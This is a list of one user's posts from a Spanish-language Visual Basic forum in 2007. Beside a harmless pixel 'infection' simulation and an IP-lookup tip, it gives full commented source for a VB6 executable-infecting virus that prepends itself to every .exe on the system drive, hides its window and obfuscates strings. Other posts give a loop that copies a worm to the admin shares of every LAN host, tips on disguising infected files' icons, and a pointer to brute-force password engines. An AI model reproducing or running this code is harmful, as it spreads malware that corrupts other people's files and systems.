|
852
|
Programación / Programación Visual Basic / Re: Como obtener datos de una web desde vb?
|
en: 7 Abril 2007, 23:56 pm
|
Es facil, pero dinos antes para que lo vas a usar... Si lo quieres para visitar una web del tipo "cualesmiip" o "showmyip", etc... lo unico que tienes que hacer es: 1) winsock.connect url,80 2) buscar un patrón que te situe delante de la IP, en el código fuente 3) con las funciones InStr y Mid sacas la IP
El código te dejo que lo pienses tú, además creo recordar que hay algo ya programado en este foro usando la web de no-ip.com para ver la IP pública Suerte
|
|
|
853
|
Programación / Programación Visual Basic / [Source] Pixel Infection
|
en: 7 Abril 2007, 23:47 pm
|
Buenas!! En una de mis rayadas de fin de semana me ha dado por programarme un "mundo virtual" de seres pixelados, os dejo una foto del programa: Hay 3 clases de píxeles: Todos los bichitos se mueven aleatoriamente por la pantalla, cumpliendo unas normas básicas, estas son: 1) Si un Virus toca un Humano, el Humano se convertirá en Virus (50% de las veces). 2) So un Virus toca un Doctor, el Doctor se convertirá en Virus (30% de las veces) 3) Si un Doctor toca un Virus, el Virus se curará: El 70% de las veces se convertirá en Humano El 30% de las veces se convertirá en Doctor
Las reglas son sencillas, y como todo está programado bajo Randomize... a veces ganan los virus y otras veces los Humanos, pero tengo un problema, a ver si entre unos cuantos lo mejoramos... 1) Si dejamos un buen rato los bichitos enchufados, éstos terminan agrupándose en la parte superior izquierda (hay que solucionarlo) 2) Molaría añadir una raza nueva, por ejemplo Mujeres que ayudaran a reproducir más humanos 3) Molaría cambiar las leyes y poner, por ejemplo, hombres lobo y vampiros, etc... 4) Estaría bien añadir sonidos cuando infecten o desinfecten bichos, con la API Beep. A parte el modo en el que está programado consume bastantes recursos, sería bueno mejorar este punto...
Dejo el código como curiosidad, no es muy útil pero a mi me divierten este tipo de cosas. Si conseguis mejorar algo o añadir cosas ponerlo en este post, el source esta comentado al máximo, si no se entiende algo me lo preguntais, pero creo que es facil de entender. PD: La idea de este programa no es mía, ví un código similar en pscode, yo me he quedado con la idea y he hecho mejoras (como la raza de los médicos por ejemplo). Saludos!!
|
|
|
854
|
Programación / Programación Visual Basic / Re: puedo hacer algo con la red lan?
|
en: 7 Abril 2007, 14:16 pm
|
Es facil, te explico lo que yo haría... 1) Hacer que el virus recoja info del PC: IP local y Mascara de subred (por ejemplo haciendo un ipconfig /all y depurando la salida). 2) Calcular cuantos equipos hay en la lan a partir de la máscara de subred, por ejemplo: Direccion: 192.168.10.58 Mascara: 255.255.255.0
Con estos datos sabrás que hay IP's comprendidas entre: 192.168.10.1 hasta 192.168.10.254
3) Empezar un bucle bestial de este tipo: For i = 1 To 255 FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\C$" 'C:\ FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\D$" 'D:\ FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\E$" 'E:\ FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\F$" 'F:\ FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\G$" 'G:\ FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\ADMIN$" 'C:\Windows FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\PRINT$" 'C:\WINDOWS\system32\spool\drivers Next i
4) Ahora te lo puedes currar y editar los archivos de inicio de forma remota (copiando archivos en la carpeta inicio, modificando win.ini, etc...) No hay que decir que necesitas permisos administrativos en la lan para poder hacer esto 5) Y para rizar el rizo, tendrías que encontrar el comando que te permite ver los recursos que comparte un equipo, te doy una pista... net view [\\nombre_pc] te da todos sus recursos xD
Saludos!! y no seas malo haciendo lanworm's
|
|
|
855
|
Programación / Programación Visual Basic / Re: For con números, muy bonito, pero con letras??
|
en: 5 Abril 2007, 21:52 pm
|
Lo que quieres hacer es un generador de fuerza bruta, que genere todas las combinaciones desde "aaaaaaa" hasta "zzzzzzzz". Te dejo 3 engines de fuerza bruta, hay uno de ellos que es rapidisimo y muy bueno, muestra los password por segundo que genera. Los códigos no son míos.
PD: Usa un bucle for dentro de otro, dentro de otro for, dentro de otro for... no te servirá, mirate estos engines
Saludos!!
|
|
|
857
|
Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6
|
en: 5 Abril 2007, 07:03 am
|
En mi máquina virtual el virus no consume tantos recursos, pero eso es tan facil como poner un sleep cada 100 archivos y solucionado.
El tema de los parametros ya era consciente, se puede solucionar de forma sencilla con una función más que recoja los parametros y se los envíe a la aplicación infectada
Para terminar, los archivos de system32 (cmd, taskkill, tasklist, etc...) tiene habilitado el SFC de Windows (Sistema de Protección de Archivos), si un virus o similar modifica, sobreescribe o elimina un ejecutable, esté se creará de nuevo pasado unos segundos. Es por eso que no se puede infectar el cmd, explorer, tasklist, etc...
Saludos!!
|
|
|
858
|
Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6
|
en: 4 Abril 2007, 23:24 pm
|
ya que de tu manera, el icono siempre sera el de TU programa, es decir, el del VB, esto canta mucho, si alguien se mete a buscar algo en su HD y se encuentra con los ejecutables todos con el mismo icono del VB...XDDD
Exacto, pero eso tiene facil solución... antes de infectar el archivo hay que leer su icono y escribirlo a nuestro código vírico, en mis pruebas con una máquina virtual funciona de maravilla, solo tienes que añadir el módulo de IconChanger.bas que ya postee aqui. Saludos!! PD: esto no estaba ya explicado por WarGhost en un papper??? Mi código es del 29 Junio 2006, desconozco si WarGhost lo hizo antes o después. Saludos!!
|
|
|
860
|
Programación / Programación Visual Basic / [Source] Infección de ejecutables en VB6
|
en: 4 Abril 2007, 23:02 pm
|
Infección de Ejecutables en Visual Basic 6.0Bueno, ya he finalizado el proyecto, lo he testeado en una máquina virtual y funciona a la perfección Os dejo el código comentado, tambien os dejo una versión compilada del proyecto y un ZIP con el source Como funciona?1- El programa principal busca por el disco duro todos los archivos con extension *.exe 2- Cuando encuentra uno, crea una copia del virus con el siguiente formato: [VIRUS]+Marca+[HUESPED] 3- Cuando se ejecuta un archivo infectado, el virus busca la Marca para separar el [VIRUS] del [HUESPED] y ejecutarlos de forma separada Form1.frmPrivate Sub Form_Load() App.TaskVisible = False If App.PrevInstance = True Then End SelfCheck End Sub
InfectModule.bas Function SelfCheck() On Error Resume Next Dim MyCode As String 'Se abre a si mismo, lee su codigo y lo guarda en "MyCode" Open App.path & "\" & App.EXEName & ".exe" For Binary As #1 MyCode = Input(LOF(1), 1) Close #1 'Separa "MyCode" buscando la marca de infección (**X**) Buffer = Split(MyCode, "(**X**)") If UBound(Buffer) = 1 Then 'Si existe la marca: Llama la funcion "DivideFiles" con el argumento del código del Huésped Hostage = Buffer(1) DivideFiles Hostage Else 'Si NO existe la marca: Llama la funcion "Subfolders" con el argumento de unidad del Sistema (C:\) Subfolders (Environ("SystemDrive") & "\") DoEvents End End If End Function Function DivideFiles(ByVal Hostage As String) Randomize On Error Resume Next Dim TmpFile As String 'Crea un archivo temporal con el código del Huésped, por ejemplo: 'C:\DOCUME~1\USER\CONFIG~1\Temp\85061.exe TmpFile = Environ("TMP") & "\" & Int((Rnd * 99999) + 1) & ".exe" Open TmpFile For Binary As #1 Put #1, , Hostage Close #1 DoEvents 'Ejecuta el archivo temporal (el Huésped) y llama al "PayLoad" del virus Shell TmpFile, vbNormalFocus Call ExecPayload End Function Function InfectFile(ByVal Victim As String) On Error Resume Next Dim VictimCode As String Dim NewCode As String Dim MyCode As String 'Se abre a si mismo, lee su codigo y lo guarda en "MyCode" Open App.path & "\" & App.EXEName & ".exe" For Binary As #1 MyCode = Input(LOF(1), 1) Close #1 'Abre el archivo Huésped, lee su código y lo guarda en "VictimCode" Open Victim For Binary As #1 VictimCode = Input(LOF(1), 1) Close #1 'Crea la variable "NewCode" donde se guarda: MyCode + (**X**) + VictimCode NewCode = MyCode & "(**X**)" & VictimCode 'Sobrescribe el archivo Huésed con el infectado Open Victim For Binary As #1 Put #1, , NewCode Close #1 End Function Function IsInfected(ByVal File As String) As Boolean On Error Resume Next Dim FileCode As String 'Abre el archivo "File", lee su codigo y lo guarda en "FileCode" Open File For Binary As #1 FileCode = Input(LOF(1), 1) Close #1 'Separa "FileCode" buscando la marca de infección (**X**) Buffer = Split(FileCode, "(**X**)") 'Devuleve "True" o "False" si ha encontrado la marca (**X**) If UBound(Buffer) <> 0 Then IsInfected = True Else IsInfected = False End If End Function Function Subfolders(path) On Error Resume Next 'Se cifra el string que carga el objeto Scripting.FileSystemObject Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav")) Set Drives = fso.Drives newpath = path Set Fold = fso.GetFolder(newpath) Set Files = Fold.Files For Each File In Files ext = fso.GetExtensionName(File.path) ext = LCase(ext) nam = LCase(File.Name) If (ext = "exe") Then If IsInfected(File.path) = False Then InfectFile (File.path) DoEvents End If End If Next Set File = Fold.Subfolders For Each Subfol In File Call Subfolders(Subfol.path) Next End Function Function ExecPayload() '####################################################### '## Si quieres que los archivos infectados ejecuten ## '## la función de buscar e infectar nuevos archivos ## '## elimina los comentario que hay a continuación ## '####################################################### 'Subfolders (Environ("SystemDrive") & "\") 'DoEvents MsgBox "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot" End End Function
Encryption.basFunction bullet(FullCode) 'Funcion que cifra Strings con el operador XOR For i = 1 To Len(FullCode) Current = Mid(FullCode, i, 1) Code = Chr(Asc(Current) Xor 2) bullet = bullet + Code Next End Function
Adjunto el código fuente del proyecto. OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!!
|
|
|
|
|
|
|